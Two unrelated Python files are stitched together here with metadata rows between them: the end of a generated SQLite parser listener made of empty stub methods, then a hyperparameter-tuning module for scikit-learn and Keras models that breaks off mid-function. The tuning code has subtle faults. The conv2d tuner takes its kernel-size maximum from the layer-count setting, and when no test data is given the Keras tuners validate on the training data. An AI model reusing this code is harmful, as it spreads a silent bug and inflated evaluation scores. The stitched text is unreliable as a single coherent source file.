def enterSimple_function_invocation(self, ctx: SQLiteParser.Simple_function_invocationContext):
pass
# Exit a parse tree produced by SQLiteParser#simple_function_invocation.
def exitSimple_function_invocation(self, ctx: SQLiteParser.Simple_function_invocationContext):
pass
# Enter a parse tree produced by SQLiteParser#aggregate_function_invocation.
def enterAggregate_function_invocation(self, ctx: SQLiteParser.Aggregate_function_invocationContext):
pass
# Exit a parse tree produced by SQLiteParser#aggregate_function_invocation.
def exitAggregate_function_invocation(self, ctx: SQLiteParser.Aggregate_function_invocationContext):
pass
# Enter a parse tree produced by SQLiteParser#window_function_invocation.
def enterWindow_function_invocation(self, ctx: SQLiteParser.Window_function_invocationContext):
pass
# Exit a parse tree produced by SQLiteParser#window_function_invocation.
def exitWindow_function_invocation(self, ctx: SQLiteParser.Window_function_invocationContext):
pass
# Enter a parse tree produced by SQLiteParser#common_table_stmt.
def enterCommon_table_stmt(self, ctx: SQLiteParser.Common_table_stmtContext):
pass
# Exit a parse tree produced by SQLiteParser#common_table_stmt.
def exitCommon_table_stmt(self, ctx: SQLiteParser.Common_table_stmtContext):
pass
# Enter a parse tree produced by SQLiteParser#order_by_stmt.
def enterOrder_by_stmt(self, ctx: SQLiteParser.Order_by_stmtContext):
pass
# Exit a parse tree produced by SQLiteParser#order_by_stmt.
def exitOrder_by_stmt(self, ctx: SQLiteParser.Order_by_stmtContext):
pass
# Enter a parse tree produced by SQLiteParser#limit_stmt.
def enterLimit_stmt(self, ctx: SQLiteParser.Limit_stmtContext):
pass
# Exit a parse tree produced by SQLiteParser#limit_stmt.
def exitLimit_stmt(self, ctx: SQLiteParser.Limit_stmtContext):
pass
# Enter a parse tree produced by SQLiteParser#ordering_term.
def enterOrdering_term(self, ctx: SQLiteParser.Ordering_termContext):
pass
# Exit a parse tree produced by SQLiteParser#ordering_term.
def exitOrdering_term(self, ctx: SQLiteParser.Ordering_termContext):
pass
# Enter a parse tree produced by SQLiteParser#asc_desc.
def enterAsc_desc(self, ctx: SQLiteParser.Asc_descContext):
pass
# Exit a parse tree produced by SQLiteParser#asc_desc.
def exitAsc_desc(self, ctx: SQLiteParser.Asc_descContext):
pass
# Enter a parse tree produced by SQLiteParser#frame_left.
def enterFrame_left(self, ctx: SQLiteParser.Frame_leftContext):
pass
# Exit a parse tree produced by SQLiteParser#frame_left.
def exitFrame_left(self, ctx: SQLiteParser.Frame_leftContext):
pass
# Enter a parse tree produced by SQLiteParser#frame_right.
def enterFrame_right(self, ctx: SQLiteParser.Frame_rightContext):
pass
# Exit a parse tree produced by SQLiteParser#frame_right.
def exitFrame_right(self, ctx: SQLiteParser.Frame_rightContext):
pass
# Enter a parse tree produced by SQLiteParser#frame_single.
def enterFrame_single(self, ctx: SQLiteParser.Frame_singleContext):
pass
# Exit a parse tree produced by SQLiteParser#frame_single.
def exitFrame_single(self, ctx: SQLiteParser.Frame_singleContext):
pass
# Enter a parse tree produced by SQLiteParser#window_function.
def enterWindow_function(self, ctx: SQLiteParser.Window_functionContext):
pass
# Exit a parse tree produced by SQLiteParser#window_function.
def exitWindow_function(self, ctx: SQLiteParser.Window_functionContext):
pass
# Enter a parse tree produced by SQLiteParser#of_OF_fset.
def enterOf_OF_fset(self, ctx: SQLiteParser.Of_OF_fsetContext):
pass
# Exit a parse tree produced by SQLiteParser#of_OF_fset.
def exitOf_OF_fset(self, ctx: SQLiteParser.Of_OF_fsetContext):
pass
# Enter a parse tree produced by SQLiteParser#default_DEFAULT__value.
def enterDefault_DEFAULT__value(self, ctx: SQLiteParser.Default_DEFAULT__valueContext):
pass
# Exit a parse tree produced by SQLiteParser#default_DEFAULT__value.
def exitDefault_DEFAULT__value(self, ctx: SQLiteParser.Default_DEFAULT__valueContext):
pass
# Enter a parse tree produced by SQLiteParser#partition_by.
def enterPartition_by(self, ctx: SQLiteParser.Partition_byContext):
pass
# Exit a parse tree produced by SQLiteParser#partition_by.
def exitPartition_by(self, ctx: SQLiteParser.Partition_byContext):
pass
# Enter a parse tree produced by SQLiteParser#order_by_expr.
def enterOrder_by_expr(self, ctx: SQLiteParser.Order_by_exprContext):
pass
# Exit a parse tree produced by SQLiteParser#order_by_expr.
def exitOrder_by_expr(self, ctx: SQLiteParser.Order_by_exprContext):
pass
# Enter a parse tree produced by SQLiteParser#order_by_expr_asc_desc.
def enterOrder_by_expr_asc_desc(self, ctx: SQLiteParser.Order_by_expr_asc_descContext):
pass
# Exit a parse tree produced by SQLiteParser#order_by_expr_asc_desc.
def exitOrder_by_expr_asc_desc(self, ctx: SQLiteParser.Order_by_expr_asc_descContext):
pass
# Enter a parse tree produced by SQLiteParser#expr_asc_desc.
def enterExpr_asc_desc(self, ctx: SQLiteParser.Expr_asc_descContext):
pass
# Exit a parse tree produced by SQLiteParser#expr_asc_desc.
def exitExpr_asc_desc(self, ctx: SQLiteParser.Expr_asc_descContext):
pass
# Enter a parse tree produced by SQLiteParser#initial_select.
def enterInitial_select(self, ctx: SQLiteParser.Initial_selectContext):
pass
# Exit a parse tree produced by SQLiteParser#initial_select.
def exitInitial_select(self, ctx: SQLiteParser.Initial_selectContext):
pass
# Enter a parse tree produced by SQLiteParser#recursive__select.
def enterRecursive__select(self, ctx: SQLiteParser.Recursive__selectContext):
pass
# Exit a parse tree produced by SQLiteParser#recursive__select.
def exitRecursive__select(self, ctx: SQLiteParser.Recursive__selectContext):
pass
# Enter a parse tree produced by SQLiteParser#unary_operator.
def enterUnary_operator(self, ctx: SQLiteParser.Unary_operatorContext):
pass
# Exit a parse tree produced by SQLiteParser#unary_operator.
def exitUnary_operator(self, ctx: SQLiteParser.Unary_operatorContext):
pass
# Enter a parse tree produced by SQLiteParser#error_message.
def enterError_message(self, ctx: SQLiteParser.Error_messageContext):
pass
# Exit a parse tree produced by SQLiteParser#error_message.
def exitError_message(self, ctx: SQLiteParser.Error_messageContext):
pass
# Enter a parse tree produced by SQLiteParser#module_argument.
def enterModule_argument(self, ctx: SQLiteParser.Module_argumentContext):
pass
# Exit a parse tree produced by SQLiteParser#module_argument.
def exitModule_argument(self, ctx: SQLiteParser.Module_argumentContext):
pass
# Enter a parse tree produced by SQLiteParser#column_alias.
def enterColumn_alias(self, ctx: SQLiteParser.Column_aliasContext):
pass
# Exit a parse tree produced by SQLiteParser#column_alias.
def exitColumn_alias(self, ctx: SQLiteParser.Column_aliasContext):
pass
# Enter a parse tree produced by SQLiteParser#keyword.
def enterKeyword(self, ctx: SQLiteParser.KeywordContext):
pass
# Exit a parse tree produced by SQLiteParser#keyword.
def exitKeyword(self, ctx: SQLiteParser.KeywordContext):
pass
# Enter a parse tree produced by SQLiteParser#name.
def enterName(self, ctx: SQLiteParser.NameContext):
pass
# Exit a parse tree produced by SQLiteParser#name.
def exitName(self, ctx: SQLiteParser.NameContext):
pass
# Enter a parse tree produced by SQLiteParser#function_name.
def enterFunction_name(self, ctx: SQLiteParser.Function_nameContext):
pass
# Exit a parse tree produced by SQLiteParser#function_name.
def exitFunction_name(self, ctx: SQLiteParser.Function_nameContext):
pass
# Enter a parse tree produced by SQLiteParser#schema_name.
def enterSchema_name(self, ctx: SQLiteParser.Schema_nameContext):
pass
# Exit a parse tree produced by SQLiteParser#schema_name.
def exitSchema_name(self, ctx: SQLiteParser.Schema_nameContext):
pass
# Enter a parse tree produced by SQLiteParser#table_name.
def enterTable_name(self, ctx: SQLiteParser.Table_nameContext):
pass
# Exit a parse tree produced by SQLiteParser#table_name.
def exitTable_name(self, ctx: SQLiteParser.Table_nameContext):
pass
# Enter a parse tree produced by SQLiteParser#table_or_index_name.
def enterTable_or_index_name(self, ctx: SQLiteParser.Table_or_index_nameContext):
pass
# Exit a parse tree produced by SQLiteParser#table_or_index_name.
def exitTable_or_index_name(self, ctx: SQLiteParser.Table_or_index_nameContext):
pass
# Enter a parse tree produced by SQLiteParser#new_table_name.
def enterNew_table_name(self, ctx: SQLiteParser.New_table_nameContext):
pass
# Exit a parse tree produced by SQLiteParser#new_table_name.
def exitNew_table_name(self, ctx: SQLiteParser.New_table_nameContext):
pass
# Enter a parse tree produced by SQLiteParser#column_name.
def enterColumn_name(self, ctx: SQLiteParser.Column_nameContext):
pass
# Exit a parse tree produced by SQLiteParser#column_name.
def exitColumn_name(self, ctx: SQLiteParser.Column_nameContext):
pass
# Enter a parse tree produced by SQLiteParser#collation_name.
def enterCollation_name(self, ctx: SQLiteParser.Collation_nameContext):
pass
# Exit a parse tree produced by SQLiteParser#collation_name.
def exitCollation_name(self, ctx: SQLiteParser.Collation_nameContext):
pass
# Enter a parse tree produced by SQLiteParser#foreign_table.
def enterForeign_table(self, ctx: SQLiteParser.Foreign_tableContext):
pass
# Exit a parse tree produced by SQLiteParser#foreign_table.
def exitForeign_table(self, ctx: SQLiteParser.Foreign_tableContext):
pass
# Enter a parse tree produced by SQLiteParser#index_name.
def enterIndex_name(self, ctx: SQLiteParser.Index_nameContext):
pass
# Exit a parse tree produced by SQLiteParser#index_name.
def exitIndex_name(self, ctx: SQLiteParser.Index_nameContext):
pass
# Enter a parse tree produced by SQLiteParser#trigger_name.
def enterTrigger_name(self, ctx: SQLiteParser.Trigger_nameContext):
pass
# Exit a parse tree produced by SQLiteParser#trigger_name.
def exitTrigger_name(self, ctx: SQLiteParser.Trigger_nameContext):
pass
# Enter a parse tree produced by SQLiteParser#view_name.
def enterView_name(self, ctx: SQLiteParser.View_nameContext):
pass
# Exit a parse tree produced by SQLiteParser#view_name.
def exitView_name(self, ctx: SQLiteParser.View_nameContext):
pass
# Enter a parse tree produced by SQLiteParser#module_name.
def enterModule_name(self, ctx: SQLiteParser.Module_nameContext):
pass
# Exit a parse tree produced by SQLiteParser#module_name.
def exitModule_name(self, ctx: SQLiteParser.Module_nameContext):
pass
# Enter a parse tree produced by SQLiteParser#pragma_name.
def enterPragma_name(self, ctx: SQLiteParser.Pragma_nameContext):
pass
# Exit a parse tree produced by SQLiteParser#pragma_name.
def exitPragma_name(self, ctx: SQLiteParser.Pragma_nameContext):
pass
# Enter a parse tree produced by SQLiteParser#savepoint_name.
def enterSavepoint_name(self, ctx: SQLiteParser.Savepoint_nameContext):
pass
# Exit a parse tree produced by SQLiteParser#savepoint_name.
def exitSavepoint_name(self, ctx: SQLiteParser.Savepoint_nameContext):
pass
# Enter a parse tree produced by SQLiteParser#table_alias.
def enterTable_alias(self, ctx: SQLiteParser.Table_aliasContext):
pass
# Exit a parse tree produced by SQLiteParser#table_alias.
def exitTable_alias(self, ctx: SQLiteParser.Table_aliasContext):
pass
# Enter a parse tree produced by SQLiteParser#transaction_name.
def enterTransaction_name(self, ctx: SQLiteParser.Transaction_nameContext):
pass
# Exit a parse tree produced by SQLiteParser#transaction_name.
def exitTransaction_name(self, ctx: SQLiteParser.Transaction_nameContext):
pass
# Enter a parse tree produced by SQLiteParser#window_name.
def enterWindow_name(self, ctx: SQLiteParser.Window_nameContext):
pass
# Exit a parse tree produced by SQLiteParser#window_name.
def exitWindow_name(self, ctx: SQLiteParser.Window_nameContext):
pass
# Enter a parse tree produced by SQLiteParser#alias.
def enterAlias(self, ctx: SQLiteParser.AliasContext):
pass
# Exit a parse tree produced by SQLiteParser#alias.
def exitAlias(self, ctx: SQLiteParser.AliasContext):
pass
# Enter a parse tree produced by SQLiteParser#filename.
def enterFilename(self, ctx: SQLiteParser.FilenameContext):
pass
# Exit a parse tree produced by SQLiteParser#filename.
def exitFilename(self, ctx: SQLiteParser.FilenameContext):
pass
# Enter a parse tree produced by SQLiteParser#base_window_name.
def enterBase_window_name(self, ctx: SQLiteParser.Base_window_nameContext):
pass
# Exit a parse tree produced by SQLiteParser#base_window_name.
def exitBase_window_name(self, ctx: SQLiteParser.Base_window_nameContext):
pass
# Enter a parse tree produced by SQLiteParser#simple_func.
def enterSimple_func(self, ctx: SQLiteParser.Simple_funcContext):
pass
# Exit a parse tree produced by SQLiteParser#simple_func.
def exitSimple_func(self, ctx: SQLiteParser.Simple_funcContext):
pass
# Enter a parse tree produced by SQLiteParser#aggregate_func.
def enterAggregate_func(self, ctx: SQLiteParser.Aggregate_funcContext):
pass
# Exit a parse tree produced by SQLiteParser#aggregate_func.
def exitAggregate_func(self, ctx: SQLiteParser.Aggregate_funcContext):
pass
# Enter a parse tree produced by SQLiteParser#table_function_name.
def enterTable_function_name(self, ctx: SQLiteParser.Table_function_nameContext):
pass
# Exit a parse tree produced by SQLiteParser#table_function_name.
def exitTable_function_name(self, ctx: SQLiteParser.Table_function_nameContext):
pass
# Enter a parse tree produced by SQLiteParser#any_name.
def enterAny_name(self, ctx: SQLiteParser.Any_nameContext):
pass
# Exit a parse tree produced by SQLiteParser#any_name.
def exitAny_name(self, ctx: SQLiteParser.Any_nameContext):
pass
del SQLiteParser
| 38.149502 | 105 | 0.746466 | 4,222 | 34,449 | 5.885599 | 0.073425 | 0.053845 | 0.089742 | 0.161536 | 0.8973 | 0.884824 | 0.883537 | 0.695601 | 0.680027 | 0.259407 | 0 | 0.000144 | 0.195071 | 34,449 | 902 | 106 | 38.191796 | 0.895993 | 0.377573 | 0 | 0.492239 | 1 | 0 | 0.000048 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.492239 | false | 0.492239 | 0.006652 | 0 | 0.501109 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
5b0968c71e963f4568ace7bd951f90a0e56e09b1 | 33,220 | py | Python | hyperparam_tuning/Tuning.py | XINZHANG-ops/OwnUtilities | 50a4be781706082e2f50705c16be3fc54a6d9e06 | [
"MIT"
] | null | null | null | hyperparam_tuning/Tuning.py | XINZHANG-ops/OwnUtilities | 50a4be781706082e2f50705c16be3fc54a6d9e06 | [
"MIT"
] | null | null | null | hyperparam_tuning/Tuning.py | XINZHANG-ops/OwnUtilities | 50a4be781706082e2f50705c16be3fc54a6d9e06 | [
"MIT"
] | null | null | null | from sklearn.metrics import f1_score
from sklearn.model_selection import StratifiedKFold
from sklearn.model_selection import ParameterGrid, ParameterSampler
import numpy as np
from functools import partial
from skopt import space, gp_minimize
import time
import os
from tensorflow import keras
from kerastuner.tuners import BayesianOptimization as keras_BayesianOptimization
from kerastuner.tuners import RandomSearch as keras_Randomsearch
from kerastuner.tuners import Hyperband as keras_Hyperband
from keras.layers import Dense, Conv2D, MaxPool2D, Flatten, Dropout
class call_back_bayesian:
def __init__(self):
self.time_stamps = []
self.accuracies = []
self.configs = []
self.all = []
self.start_time = time.time()
def time_stamp_call(self, res):
self.time_stamps.append(time.time())
def accuracy_call(self, res):
self.accuracies.append(res['func_vals'][-1])
def config_call(self, res):
self.configs.append(res['x_iters'][-1])
def all_call(self, res):
self.all.append(list(res.items()))
class Bayesian:
def __init__(
self,
model_callable,
param_space,
x_train,
y_train,
kfold_n_splits=5,
score_sign=-1,
score_measure=None,
x_test=None,
y_test=None
):
"""
@param model_callable:
@param param_space:
@param x_train:
@param y_train:
@param n_calls:
@param kfold_n_splits: this is used when no x_test, y_test given, cross validate score, but if x_test, y_test are given, not used
@param score_sign: -1 if we want to max the value return by score_measure, 1 if we want to min it
@param score_measure: default None for f1_score with avg is macro, callable for score calculation, take y_true as first arg, y_pred as second arg
@param x_test: test data set data
@param y_test: test data set label
"""
self.model = model_callable
self.x_train = x_train
self.y_train = y_train
self.x_test = x_test
self.y_test = y_test
self.param_space = []
self.param_names = []
for param_config in param_space:
self.param_names.append(param_config[-1])
if isinstance(param_config[0], list):
self.param_space.append(space.Categorical(param_config[0], name=param_config[-1]))
elif isinstance(param_config[0], float):
self.param_space.append(
space.Real(
low=param_config[0],
high=param_config[1],
prior='uniform',
name=param_config[-1]
)
)
elif isinstance(param_config[0], int):
self.param_space.append(
space.Integer(low=param_config[0], high=param_config[1], name=param_config[-1])
)
else:
raise
self.kfold_n_splits = kfold_n_splits
if score_measure is not None:
self.score_sign = score_sign
self.score_measure = score_measure
else:
self.score_measure = partial(f1_score, average='macro')
self.score_sign = -1
def bayesian_optimize(self, params, param_names, x, y, kfold_n_splits):
params = dict(zip(param_names, params))
model = self.model(**params)
if self.x_test is not None and self.y_test is not None:
model.fit(self.x_train, self.y_train)
pred = model.predict(self.x_test)
acc = self.score_measure(y_true=self.y_test, y_pred=pred)
return self.score_sign * acc
else:
kf = StratifiedKFold(n_splits=kfold_n_splits)
accuracies = []
for idx in kf.split(X=x, y=y):
train_idx, test_idx = idx[0], idx[1]
xtrain = x[train_idx]
ytrain = y[train_idx]
xtest = x[test_idx]
ytest = y[test_idx]
model.fit(xtrain, ytrain)
pred = model.predict(xtest)
fold_acc = self.score_measure(y_true=ytest, y_pred=pred)
accuracies.append(fold_acc)
# note we multiply by -1 only when we want to max this score, if we deal with log, we want to remove -1
return self.score_sign * np.mean(accuracies)
def train(self, n_calls=10, verbose=True):
optimization_function = partial(
self.bayesian_optimize,
param_names=self.param_names,
x=self.x_train,
y=self.y_train,
kfold_n_splits=self.kfold_n_splits,
)
bayesian_callback = call_back_bayesian()
result = gp_minimize(
optimization_function,
dimensions=self.param_space,
n_calls=n_calls,
n_initial_points=10,
verbose=verbose,
callback=[
bayesian_callback.time_stamp_call, bayesian_callback.accuracy_call,
bayesian_callback.config_call, bayesian_callback.all_call
]
)
return result, bayesian_callback
class GridSearch:
def __init__(
self,
model_callable,
param_space,
x_train,
y_train,
kfold_n_splits=5,
score_measure=None,
x_test=None,
y_test=None
):
"""
@param model_callable:
@param param_space:
@param x_train:
@param y_train:
@param kfold_n_splits: this is used when no x_test, y_test given, cross validate score, but if x_test, y_test are given, not used
@param score_sign:
@param score_measure:
@param x_test:
@param y_test:
"""
self.search_space = ParameterGrid(param_space)
self.model = model_callable
self.x_train = x_train
self.y_train = y_train
self.x_test = x_test
self.y_test = y_test
self.kfold_n_splits = kfold_n_splits
self.highest_score = 0
self.lowest_score = 0
if score_measure is not None:
self.score_measure = score_measure
else:
self.score_measure = partial(f1_score, average='macro')
self.history = []
def train(self, verbose=True):
for index, params in enumerate(self.search_space):
if verbose:
print(f'Step {index+1} starts, {len(self.search_space)-index-1} steps remaining')
start_time = time.time()
model = self.model(**params)
if self.x_test is not None and self.y_test is not None:
model.fit(self.x_train, self.y_train)
pred = model.predict(self.x_test)
acc = self.score_measure(y_true=self.y_test, y_pred=pred)
# params, score, step_time
self.history.append((params, acc, time.time() - start_time))
else:
kf = StratifiedKFold(n_splits=self.kfold_n_splits)
accuracies = []
for idx in kf.split(X=self.x_train, y=self.y_train):
train_idx, test_idx = idx[0], idx[1]
xtrain = self.x_train[train_idx]
ytrain = self.y_train[train_idx]
xtest = self.x_train[test_idx]
ytest = self.y_train[test_idx]
model.fit(xtrain, ytrain)
pred = model.predict(xtest)
fold_acc = self.score_measure(y_true=ytest, y_pred=pred)
accuracies.append(fold_acc)
self.history.append((params, np.mean(accuracies), time.time() - start_time))
if index == 0:
self.highest_score = self.history[-1][1]
self.lowest_score = self.history[-1][1]
if self.history[-1][1] > self.highest_score:
self.highest_score = self.history[-1][1]
if self.history[-1][1] < self.lowest_score:
self.lowest_score = self.history[-1][1]
if verbose:
print(
f'Step {index+1} ends, time spent: {round(self.history[-1][-1], 2)}s, step score: {round(self.history[-1][1], 2)}, highest: {round(self.highest_score, 2)}, loweest: {round(self.lowest_score, 2)}'
)
print('**********************')
return sorted(self.history, key=lambda tup: tup[1], reverse=True)
class RandomSearch:
def __init__(
self,
model_callable,
param_space,
x_train,
y_train,
kfold_n_splits=5,
score_measure=None,
x_test=None,
y_test=None
):
"""
@param model_callable:
@param param_space: for int and categorical, a list of values, for real, use scipy.stats.distributions, an example is scipy.stats.distributions.uniform
@param x_train:
@param y_train:
@param kfold_n_splits: this is used when no x_test, y_test given, cross validate score, but if x_test, y_test are given, not used
@param score_sign:
@param score_measure:
@param x_test:
@param y_test:
"""
self.search_space = param_space
self.model = model_callable
self.x_train = x_train
self.y_train = y_train
self.x_test = x_test
self.y_test = y_test
self.kfold_n_splits = kfold_n_splits
self.highest_score = 0
self.lowest_score = 0
if score_measure is not None:
self.score_measure = score_measure
else:
self.score_measure = partial(f1_score, average='macro')
self.history = []
def train(self, n_iter=10, random_state=None, verbose=True):
rng = np.random.RandomState(random_state)
search_space = list(ParameterSampler(self.search_space, n_iter=n_iter, random_state=rng))
for index, params in enumerate(search_space):
if verbose:
print(f'Step {index + 1} starts, {len(search_space) - index - 1} steps remaining')
start_time = time.time()
model = self.model(**params)
if self.x_test is not None and self.y_test is not None:
model.fit(self.x_train, self.y_train)
pred = model.predict(self.x_test)
acc = self.score_measure(y_true=self.y_test, y_pred=pred)
# params, score, step_time
self.history.append((params, acc, time.time() - start_time))
else:
kf = StratifiedKFold(n_splits=self.kfold_n_splits)
accuracies = []
for idx in kf.split(X=self.x_train, y=self.y_train):
train_idx, test_idx = idx[0], idx[1]
xtrain = self.x_train[train_idx]
ytrain = self.y_train[train_idx]
xtest = self.x_train[test_idx]
ytest = self.y_train[test_idx]
model.fit(xtrain, ytrain)
pred = model.predict(xtest)
fold_acc = self.score_measure(y_true=ytest, y_pred=pred)
accuracies.append(fold_acc)
self.history.append((params, np.mean(accuracies), time.time() - start_time))
if index == 0:
self.highest_score = self.history[-1][1]
self.lowest_score = self.history[-1][1]
if self.history[-1][1] > self.highest_score:
self.highest_score = self.history[-1][1]
if self.history[-1][1] < self.lowest_score:
self.lowest_score = self.history[-1][1]
if verbose:
print(
f'Step {index + 1} ends, time spent: {round(self.history[-1][-1], 2)}s, step score: {round(self.history[-1][1], 2)}, highest: {round(self.highest_score, 2)}, loweest: {round(self.lowest_score, 2)}'
)
print('**********************')
return sorted(self.history, key=lambda tup: tup[1], reverse=True)
class keras_dense_model_tune:
def __init__(
self,
n_layers_min_max_step=(5, 10, 1),
layer_size_min_max_step=(5, 100, 5),
output_layer_size_act=(None, None),
activations=None,
optimizers=None,
losses=None
):
"""
@param output_layer_size_act: this one need to be separated because the output shape, but if set None, it will find the dim from y_train
@param n_layers_min_max_step:
@param layer_size_min_max_step:
@param activations:
@param optimizers:
@param losses:
"""
self.output_layer_size = output_layer_size_act[0]
self.output_layer_act = output_layer_size_act[1]
self.n_layers_min = n_layers_min_max_step[0]
self.n_layers_max = n_layers_min_max_step[1]
self.n_layers_step = n_layers_min_max_step[2]
self.layer_size_min = layer_size_min_max_step[0]
self.layer_size_max = layer_size_min_max_step[1]
self.layer_size_step = layer_size_min_max_step[2]
self.activations_default = [
'relu', "sigmoid", "softmax", "softplus", "softsign", "tanh", "selu", "elu"
]
self.optimizers_default = [
"sgd", "rmsprop", "adam", "adadelta", "adagrad", "adamax", "nadam", "ftrl"
]
self.losses_default = ["categorical_crossentropy"]
if activations is not None:
self.activations = activations
else:
self.activations = self.activations_default.copy()
if optimizers is not None:
self.optimizers = optimizers
else:
self.optimizers = self.optimizers_default.copy()
if losses is not None:
self.losses = losses
else:
self.losses = self.losses_default.copy()
def build_model(self, hp):
model = keras.models.Sequential()
for i in range(hp.Int('n_layers', min_value=self.n_layers_min, max_value=self.n_layers_max,
step=self.n_layers_step)):
model.add(
Dense(
units=hp.Int(
f'layer_{i}_size',
min_value=self.layer_size_min,
max_value=self.layer_size_max,
step=self.layer_size_step,
),
activation=hp.Choice(f'layer_{i}_act', values=self.activations)
)
)
model.add(Dense(units=self.output_layer_size, activation=self.output_layer_act))
model.compile(
optimizer=hp.Choice(f'optimizer', values=self.optimizers),
loss=hp.Choice(f'loss', values=self.losses),
)
return model
def ramdom_search_tune(
self,
x_train,
y_train,
x_test=None,
y_test=None,
epochs=10,
batch_size=32,
n_trials=10,
executions_per_trial=1,
save_dir=".",
project_name='keras_model_tune',
task_type='classification'
):
"""
@param x_train:
@param y_train:
@param x_test:
@param y_test:
@param epochs:
@param batch_size:
@param n_trials:
@param executions_per_trial:
@param save_dir:
@param project_name:
@param task_type: string 'classification' or 'regression'
@return:
"""
if self.output_layer_size is None:
self.output_layer_size = y_train.shape[1]
if self.output_layer_act is None:
self.output_layer_act = 'softmax'
tuner = keras_Randomsearch(
self.build_model,
objective='val_accuracy' if task_type == 'classification' else 'val_loss',
max_trials=n_trials,
executions_per_trial=executions_per_trial,
directory=save_dir,
project_name=project_name
)
if x_test is None and y_test is None:
x_test = x_train.copy()
y_test = y_train.copy()
tuner.search(
x=x_train,
y=y_train,
epochs=epochs,
batch_size=batch_size,
validation_data=(x_test, y_test)
)
return tuner
def bayesian_tune(
self,
x_train,
y_train,
x_test=None,
y_test=None,
epochs=10,
batch_size=32,
n_trials=10,
executions_per_trial=1,
save_dir=".",
project_name='keras_model_tune',
task_type='classification'
):
if self.output_layer_size is None:
self.output_layer_size = y_train.shape[1]
if self.output_layer_act is None:
self.output_layer_act = 'softmax'
tuner = keras_BayesianOptimization(
self.build_model,
objective='val_accuracy' if task_type == 'classification' else 'val_loss',
max_trials=n_trials,
executions_per_trial=executions_per_trial,
directory=save_dir,
project_name=project_name
)
if x_test is None and y_test is None:
x_test = x_train.copy()
y_test = y_train.copy()
tuner.search(
x=x_train,
y=y_train,
epochs=epochs,
batch_size=batch_size,
validation_data=(x_test, y_test)
)
return tuner
def hyperband_tune(
self,
x_train,
y_train,
x_test=None,
y_test=None,
epochs=10,
max_epochs=15,
factor=1,
batch_size=32,
executions_per_trial=1,
save_dir=".",
project_name='keras_model_tune',
task_type='classification'
):
if self.output_layer_size is None:
self.output_layer_size = y_train.shape[1]
if self.output_layer_act is None:
self.output_layer_act = 'softmax'
tuner = keras_Hyperband(
self.build_model,
objective='val_accuracy' if task_type == 'classification' else 'val_loss',
max_epochs=max_epochs,
factor=factor,
executions_per_trial=executions_per_trial,
directory=save_dir,
project_name=project_name
)
if x_test is None and y_test is None:
x_test = x_train.copy()
y_test = y_train.copy()
tuner.search(
x=x_train,
y=y_train,
epochs=epochs,
batch_size=batch_size,
validation_data=(x_test, y_test)
)
return tuner
class keras_conv2d_model_tune:
def __init__(
self,
n_conv_layers_min_max_step=(5, 10, 1),
conv_layer_size_min_max_step=(32, 256, 32),
kernel_size_min_max_step=(2, 3, 1),
strides_min_max_step=(1, 2, 1),
output_layer_size_act=(None, None),
activations=None,
optimizers=None,
losses=None
):
self.output_layer_size = output_layer_size_act[0]
self.output_layer_act = output_layer_size_act[1]
self.n_conv_layers_min = n_conv_layers_min_max_step[0]
self.n_conv_layers_max = n_conv_layers_min_max_step[1]
self.n_conv_layers_step = n_conv_layers_min_max_step[2]
self.kernel_size_min = kernel_size_min_max_step[0]
self.kernel_size_max = kernel_size_min_max_step[1]
self.kernel_size_step = kernel_size_min_max_step[2]
self.strides_min = strides_min_max_step[0]
self.strides_max = strides_min_max_step[1]
self.strides_step = strides_min_max_step[2]
self.conv_layer_size_min = conv_layer_size_min_max_step[0]
self.conv_layer_size_max = conv_layer_size_min_max_step[1]
self.conv_layer_size_step = conv_layer_size_min_max_step[2]
self.X_train = np.array([])
self.activations_default = [
'relu', "sigmoid", "softmax", "softplus", "softsign", "tanh", "selu", "elu"
]
self.optimizers_default = [
"sgd", "rmsprop", "adam", "adadelta", "adagrad", "adamax", "nadam", "ftrl"
]
self.losses_default = ["categorical_crossentropy"]
if activations is not None:
self.activations = activations
else:
self.activations = self.activations_default.copy()
if optimizers is not None:
self.optimizers = optimizers
else:
self.optimizers = self.optimizers_default.copy()
if losses is not None:
self.losses = losses
else:
self.losses = self.losses_default.copy()
def build_model(self, hp):
model = keras.models.Sequential()
model.add(
Conv2D(
hp.Int(
'input_conv_units',
min_value=self.conv_layer_size_min,
max_value=self.conv_layer_size_max,
step=self.conv_layer_size_step,
default=32
),
kernel_size=hp.Int(
'input_conv_kernel_size',
min_value=self.kernel_size_min,
max_value=self.n_conv_layers_max,
step=self.kernel_size_step,
default=3
),
strides=hp.Int(
'input_conv_strides',
min_value=self.strides_min,
max_value=self.strides_max,
step=self.strides_step,
default=1
),
input_shape=self.X_train.shape[1:],
activation=hp.Choice(f'input_conv_act', values=self.activations)
)
)
model.add(MaxPool2D(pool_size=(2, 2)))
for i in range(hp.Int('n_conv_layers', min_value=self.n_conv_layers_min,
max_value=self.n_conv_layers_max, step=self.n_conv_layers_step,
default=2)):
model.add(
Conv2D(
hp.Int(
f'conv_{i}_units',
min_value=self.conv_layer_size_min,
max_value=self.conv_layer_size_max,
step=self.conv_layer_size_step,
),
kernel_size=hp.Int(
f'conv_{i}_kernel_size',
min_value=self.kernel_size_min,
max_value=self.n_conv_layers_max,
step=self.kernel_size_step
),
strides=hp.Int(
f'conv_{i}_strides',
min_value=self.strides_min,
max_value=self.strides_max,
step=self.strides_step
),
activation=hp.Choice(f'conv_{i}_act', values=self.activations)
)
)
model.add(Flatten())
model.add(Dense(units=self.output_layer_size, activation=self.output_layer_act))
model.compile(
optimizer=hp.Choice(f'optimizer', values=self.optimizers),
loss=hp.Choice(f'loss', values=self.losses),
)
return model
def ramdom_search_tune(
self,
x_train,
y_train,
x_test=None,
y_test=None,
epochs=10,
batch_size=32,
n_trials=10,
executions_per_trial=1,
save_dir=".",
project_name='keras_model_tune',
task_type='classification'
):
self.X_train = x_train.copy()
if self.output_layer_size is None:
self.output_layer_size = y_train.shape[1]
if self.output_layer_act is None:
self.output_layer_act = 'softmax'
tuner = keras_Randomsearch(
self.build_model,
objective='val_accuracy' if task_type == 'classification' else 'val_loss',
max_trials=n_trials,
executions_per_trial=executions_per_trial,
directory=save_dir,
project_name=project_name
)
if x_test is None and y_test is None:
x_test = x_train.copy()
y_test = y_train.copy()
tuner.search(
x=x_train,
y=y_train,
epochs=epochs,
batch_size=batch_size,
validation_data=(x_test, y_test)
)
